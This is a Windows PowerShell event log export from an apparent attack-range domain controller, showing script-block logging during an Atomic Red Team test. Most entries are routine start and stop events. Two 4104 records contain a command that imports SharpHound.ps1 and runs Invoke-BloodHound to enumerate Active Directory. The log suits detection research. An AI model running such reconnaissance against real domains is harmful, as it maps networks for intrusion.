Message=Started invocation of ScriptBlock ID: 2e123301-e8bd-4ee2-8104-19a55bf041fc
Runspace ID: 0243ea81-2591-4bc0-906a-7eecfe115266
06/15/2021 05:01:21 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469806
Keywords=None
Message=Completed invocation of ScriptBlock ID: 36320e36-7bcd-409f-b596-416f1e7b52dc
Runspace ID: 0243ea81-2591-4bc0-906a-7eecfe115266
06/15/2021 05:01:21 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469805
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9e811b2d-9c33-4fcd-ba74-15cb6564c169
Runspace ID: 0243ea81-2591-4bc0-906a-7eecfe115266
06/15/2021 05:01:21 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469804
Keywords=None
Message=Started invocation of ScriptBlock ID: 9e811b2d-9c33-4fcd-ba74-15cb6564c169
Runspace ID: 0243ea81-2591-4bc0-906a-7eecfe115266
06/15/2021 05:01:21 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1469803
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $_.OriginInfo }

ScriptBlock ID: 9e811b2d-9c33-4fcd-ba74-15cb6564c169
Path:
06/15/2021 05:01:21 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469802
Keywords=None
Message=Completed invocation of ScriptBlock ID: dae4bd6a-2638-496e-a121-925cb0818c43
Runspace ID: 0243ea81-2591-4bc0-906a-7eecfe115266
06/15/2021 05:01:21 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469801
Keywords=None
Message=Started invocation of ScriptBlock ID: dae4bd6a-2638-496e-a121-925cb0818c43
Runspace ID: 0243ea81-2591-4bc0-906a-7eecfe115266
06/15/2021 05:01:21 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1469800
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $_.ErrorCategory_Message }

ScriptBlock ID: dae4bd6a-2638-496e-a121-925cb0818c43
Path:
06/15/2021 05:01:21 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469799
Keywords=None
Message=Completed invocation of ScriptBlock ID: 92801502-0f4d-4080-b7ec-797963784464
Runspace ID: 0243ea81-2591-4bc0-906a-7eecfe115266
06/15/2021 05:01:21 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469798
Keywords=None
Message=Completed invocation of ScriptBlock ID: c9165272-9665-487d-84f2-51cbab382e4f
Runspace ID: 0243ea81-2591-4bc0-906a-7eecfe115266
06/15/2021 05:01:21 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469797
Keywords=None
Message=Completed invocation of ScriptBlock ID: a7d62484-1782-43fb-bf8e-f58581262544
Runspace ID: 0243ea81-2591-4bc0-906a-7eecfe115266
06/15/2021 05:01:21 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469796
Keywords=None
Message=Started invocation of ScriptBlock ID: a7d62484-1782-43fb-bf8e-f58581262544
Runspace ID: 0243ea81-2591-4bc0-906a-7eecfe115266
06/15/2021 05:01:21 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1469795
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $this.Exception.InnerException.PSMessageDetails }

ScriptBlock ID: a7d62484-1782-43fb-bf8e-f58581262544
Path:
06/15/2021 05:01:21 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469794
Keywords=None
Message=Started invocation of ScriptBlock ID: c9165272-9665-487d-84f2-51cbab382e4f
Runspace ID: 0243ea81-2591-4bc0-906a-7eecfe115266
06/15/2021 05:01:21 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469793
Keywords=None
Message=Started invocation of ScriptBlock ID: 92801502-0f4d-4080-b7ec-797963784464
Runspace ID: 0243ea81-2591-4bc0-906a-7eecfe115266
06/15/2021 05:01:21 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1469792
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $_.PSMessageDetails }

ScriptBlock ID: 92801502-0f4d-4080-b7ec-797963784464
Path:
06/15/2021 05:01:21 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469791
Keywords=None
Message=Started invocation of ScriptBlock ID: 36320e36-7bcd-409f-b596-416f1e7b52dc
Runspace ID: 0243ea81-2591-4bc0-906a-7eecfe115266
06/15/2021 05:01:21 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469790
Keywords=None
Message=Completed invocation of ScriptBlock ID: 2e123301-e8bd-4ee2-8104-19a55bf041fc
Runspace ID: 0243ea81-2591-4bc0-906a-7eecfe115266
06/15/2021 05:01:21 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469789
Keywords=None
Message=Started invocation of ScriptBlock ID: 2e123301-e8bd-4ee2-8104-19a55bf041fc
Runspace ID: 0243ea81-2591-4bc0-906a-7eecfe115266
06/15/2021 05:01:21 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469788
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5fd44a26-70f8-47c0-9081-b77607ee1cc2
Runspace ID: 0243ea81-2591-4bc0-906a-7eecfe115266
06/15/2021 05:01:21 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469787
Keywords=None
Message=Started invocation of ScriptBlock ID: 5fd44a26-70f8-47c0-9081-b77607ee1cc2
Runspace ID: 0243ea81-2591-4bc0-906a-7eecfe115266
06/15/2021 05:01:21 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469786
Keywords=None
Message=Completed invocation of ScriptBlock ID: ae5b4cb9-bc42-4510-b1d2-23d30b8515df
Runspace ID: 0243ea81-2591-4bc0-906a-7eecfe115266
06/15/2021 05:01:21 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469785
Keywords=None
Message=Started invocation of ScriptBlock ID: ae5b4cb9-bc42-4510-b1d2-23d30b8515df
Runspace ID: 0243ea81-2591-4bc0-906a-7eecfe115266
06/15/2021 05:01:21 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469784
Keywords=None
Message=Started invocation of ScriptBlock ID: 4278ab25-259b-4663-b63c-9489d693a0cd
Runspace ID: 0243ea81-2591-4bc0-906a-7eecfe115266
06/15/2021 05:01:21 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1469783
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{write-host "Import and Execution of SharpHound.ps1 from C:\AtomicRedTeam\atomics\T1059.001\src" -ForegroundColor Cyan
import-module C:\AtomicRedTeam\atomics\T1059.001\src\SharpHound.ps1
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5}

ScriptBlock ID: 4278ab25-259b-4663-b63c-9489d693a0cd
Path:
06/15/2021 05:01:21 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469782
Keywords=None
Message=Started invocation of ScriptBlock ID: 21ca6d5f-b596-4803-8c8d-27af84293470
Runspace ID: 0243ea81-2591-4bc0-906a-7eecfe115266
06/15/2021 05:01:21 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1469781
Keywords=None
Message=Creating Scriptblock text (1 of 1):
& {write-host "Import and Execution of SharpHound.ps1 from C:\AtomicRedTeam\atomics\T1059.001\src" -ForegroundColor Cyan
import-module C:\AtomicRedTeam\atomics\T1059.001\src\SharpHound.ps1
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5}

ScriptBlock ID: 21ca6d5f-b596-4803-8c8d-27af84293470
Path:
06/15/2021 05:01:21 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40962
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Stop
RecordNumber=1469780
Keywords=None
Message=PowerShell console is ready for user input
06/15/2021 05:01:21 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=53504
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Named Pipe IPC
OpCode=Open (async)
RecordNumber=1469779
Keywords=None
Message=Windows PowerShell has started an IPC listening thread on process: 4660 in AppDomain: DefaultAppDomain.
06/15/2021 05:01:21 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40961
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Start
RecordNumber=1469778
Keywords=None
Message=PowerShell console is starting up
06/15/2021 05:01:21 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469777
Keywords=None
Message=Started invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:21 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469776
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:21 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469775
Keywords=None
Message=Completed invocation of ScriptBlock ID: 7e434dd3-d70d-47fd-bebf-987ac7eb8aab
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:21 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469774
Keywords=None
Message=Started invocation of ScriptBlock ID: 7e434dd3-d70d-47fd-bebf-987ac7eb8aab
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:21 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469773
Keywords=None
Message=Started invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:21 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469772
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:21 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469771
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469878
Keywords=None
Message=Completed invocation of ScriptBlock ID: 93284947-297d-4766-b11c-d50f689ee72a
Runspace ID: f90d6cb4-af21-4afb-9a94-8dad01f09052
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469877
Keywords=None
Message=Completed invocation of ScriptBlock ID: 8c09fbf8-7f03-41dd-ad0d-0544817529d4
Runspace ID: f90d6cb4-af21-4afb-9a94-8dad01f09052
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469876
Keywords=None
Message=Started invocation of ScriptBlock ID: 8c09fbf8-7f03-41dd-ad0d-0544817529d4
Runspace ID: f90d6cb4-af21-4afb-9a94-8dad01f09052
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469875
Keywords=None
Message=Completed invocation of ScriptBlock ID: 8f35c8e3-e60d-4bc3-9ceb-3313d3bfcbd2
Runspace ID: f90d6cb4-af21-4afb-9a94-8dad01f09052
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469874
Keywords=None
Message=Started invocation of ScriptBlock ID: 8f35c8e3-e60d-4bc3-9ceb-3313d3bfcbd2
Runspace ID: f90d6cb4-af21-4afb-9a94-8dad01f09052
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469873
Keywords=None
Message=Completed invocation of ScriptBlock ID: 78949942-d72e-4e98-a46a-a64dabe56d7c
Runspace ID: f90d6cb4-af21-4afb-9a94-8dad01f09052
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469872
Keywords=None
Message=Completed invocation of ScriptBlock ID: 07bb087f-ac29-4594-ab2e-52daaf305f0b
Runspace ID: f90d6cb4-af21-4afb-9a94-8dad01f09052
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469871
Keywords=None
Message=Completed invocation of ScriptBlock ID: 662a668f-f417-451a-8104-f1ba6f7ed73d
Runspace ID: f90d6cb4-af21-4afb-9a94-8dad01f09052
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469870
Keywords=None
Message=Started invocation of ScriptBlock ID: 662a668f-f417-451a-8104-f1ba6f7ed73d
Runspace ID: f90d6cb4-af21-4afb-9a94-8dad01f09052
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469869
Keywords=None
Message=Started invocation of ScriptBlock ID: 07bb087f-ac29-4594-ab2e-52daaf305f0b
Runspace ID: f90d6cb4-af21-4afb-9a94-8dad01f09052
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469868
Keywords=None
Message=Started invocation of ScriptBlock ID: 78949942-d72e-4e98-a46a-a64dabe56d7c
Runspace ID: f90d6cb4-af21-4afb-9a94-8dad01f09052
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469867
Keywords=None
Message=Started invocation of ScriptBlock ID: 93284947-297d-4766-b11c-d50f689ee72a
Runspace ID: f90d6cb4-af21-4afb-9a94-8dad01f09052
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469866
Keywords=None
Message=Completed invocation of ScriptBlock ID: 7fbbfd3e-7f5f-4fa7-b953-69c6994271e7
Runspace ID: f90d6cb4-af21-4afb-9a94-8dad01f09052
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469865
Keywords=None
Message=Started invocation of ScriptBlock ID: 7fbbfd3e-7f5f-4fa7-b953-69c6994271e7
Runspace ID: f90d6cb4-af21-4afb-9a94-8dad01f09052
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469864
Keywords=None
Message=Completed invocation of ScriptBlock ID: 93284947-297d-4766-b11c-d50f689ee72a
Runspace ID: f90d6cb4-af21-4afb-9a94-8dad01f09052
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469863
Keywords=None
Message=Completed invocation of ScriptBlock ID: 8c09fbf8-7f03-41dd-ad0d-0544817529d4
Runspace ID: f90d6cb4-af21-4afb-9a94-8dad01f09052
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469862
Keywords=None
Message=Started invocation of ScriptBlock ID: 8c09fbf8-7f03-41dd-ad0d-0544817529d4
Runspace ID: f90d6cb4-af21-4afb-9a94-8dad01f09052
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1469861
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $_.OriginInfo }

ScriptBlock ID: 8c09fbf8-7f03-41dd-ad0d-0544817529d4
Path:
06/15/2021 05:01:26 PM
LogName=Microsoft-Windows-PowerShell/Operational
